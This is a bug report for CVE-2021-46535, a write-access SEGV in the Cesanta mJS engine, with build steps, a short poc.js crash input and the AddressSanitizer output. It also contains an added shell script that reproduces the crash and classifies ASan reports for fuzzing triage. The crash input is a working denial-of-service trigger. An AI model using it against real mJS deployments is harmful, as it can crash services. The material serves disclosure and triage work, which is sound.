CVE-2021-46535: SEGV (/usr/local/bin/mjs+0xe533e) · Issue #209 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via /usr/local/bin/mjs+0xe533e. This vulnerability can lead to a Denial of Service (DoS).
mJS revision
Commit: b1b6eac
Version:
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
Edit the Makefile (vim Makefile) so that the compiler variable points at the host gcc:
DOCKER_GCC=gcc
so that the compile rule
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
runs gcc directly. Save the Makefile, then build:
make
Test case: poc.js
isNaN(--isNaN) !== true
if (isNaN(-function () { return 1 }) !== true) {
$ERROR('#Error' + (-function () { return 1 }));
}
Execution steps & Output
$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==36318==ERROR: AddressSanitizer: SEGV on unknown address 0x559b7cd412cc (pc 0x559b7cd4133f bp 0x000000000043 sp 0x7fff0319d2b8 T0)
==36318==The signal is caused by a WRITE memory access.
    #0 0x559b7cd4133e (/usr/local/bin/mjs+0xe533e)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/mjs+0xe533e)
==36318==ABORTING
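The build, run and triage steps above, collected into one reproduction script. This is an added example, not code from the mjs project or from the reporter. It assumes the mjs Makefile defines DOCKER_GCC on a single line (so the edit the reporter made by hand in vim can be done with sed), that `make` produces `build/mjs` as the report shows, that the binary is ASan-instrumented (the report's output is an AddressSanitizer report), and that the repository is at https://github.com/cesanta/mjs.git; the helper names (`patch_makefile`, `write_poc`, `classify_asan`, `reproduce`) are mine. `classify_asan` reduces any ASan report, not only this one, to a "kind / access type / top frame" key, which is what you want for de-duplicating crashes from a fuzzing run. Two caveats a triager should keep in mind: the report's #0 frame is unsymbolized (binary+offset), and its frame pointer (bp 0x000000000043) is not a plausible stack address, so build with `-g` and have llvm-symbolizer on PATH before drawing conclusions about which function faults.

```shell
#!/bin/sh
# Added reproduction helper for the report above (not part of the mjs project
# or the original issue). Assumptions: the Makefile defines DOCKER_GCC on one
# line, the build yields build/mjs, and the binary is ASan-instrumented.

# Rewrite the DOCKER_GCC definition so that the compile rule
#   $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# runs the host gcc, as the reporter did by hand in vim. Handles =, :=, ?=.
patch_makefile() {
  mk="$1"
  sed 's/^DOCKER_GCC[[:space:]]*[:?]*=.*/DOCKER_GCC = gcc/' "$mk" > "$mk.tmp" \
    && mv "$mk.tmp" "$mk"
}

# Write the reporter's test case (poc.js) verbatim; quoted heredoc so $ERROR
# is not expanded by the shell.
write_poc() {
  cat > "$1" <<'EOF'
isNaN(--isNaN) !== true
if (isNaN(-function () { return 1 }) !== true) {
  $ERROR('#Error' + (-function () { return 1 }));
}
EOF
}

# Reduce an ASan report to a one-line triage key "<kind> <access> <frame0>",
# e.g. "SEGV WRITE /usr/local/bin/mjs+0xe533e" for the report above.
# Works for SEGV reports ("signal is caused by a WRITE memory access") and for
# the "READ/WRITE of size N" form used by heap/stack/global overflow reports;
# the frame is taken from the #0 line, with or without symbols.
classify_asan() {
  log="$1"
  kind=$(sed -n 's/^SUMMARY: AddressSanitizer: \([A-Za-z-]*\).*/\1/p' "$log" | head -n 1)
  access=$(sed -n \
    -e 's/.*signal is caused by a \([A-Z]*\) memory access.*/\1/p' \
    -e 's/^\([A-Z]*\) of size .*/\1/p' "$log" | head -n 1)
  frame=$(sed -n 's/^[[:space:]]*#0 0x[0-9a-fA-F]* //p' "$log" | head -n 1 \
    | sed 's/^in //; s/^(//; s/)$//')
  printf '%s %s %s\n' "${kind:-UNKNOWN}" "${access:-UNKNOWN}" "${frame:-UNKNOWN}"
}

# Full reproduction as the report describes: check out the named commit, build
# natively, run the PoC and triage the ASan output. Needs network and gcc.
reproduce() {
  work="${1:-$(mktemp -d)}"
  git clone https://github.com/cesanta/mjs.git "$work/mjs"
  (cd "$work/mjs" && git checkout b1b6eac)   # commit given in the report
  patch_makefile "$work/mjs/Makefile"
  (cd "$work/mjs" && make)                   # report's build step -> build/mjs
  write_poc "$work/poc.js"
  # The crash exits non-zero; keep going so the log gets classified.
  "$work/mjs/build/mjs" "$work/poc.js" > "$work/asan.log" 2>&1 || true
  classify_asan "$work/asan.log"
}

# Usage: reproduce [workdir]
```

Run `reproduce` in an empty directory; it prints the triage key for the crash it observed, which you can compare against the report's `SEGV WRITE /usr/local/bin/mjs+0xe533e` (the offset will differ for a different build, which is exactly why the symbolized frame, not the raw offset, is the value worth comparing).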
Credits: Found by OWL337 team.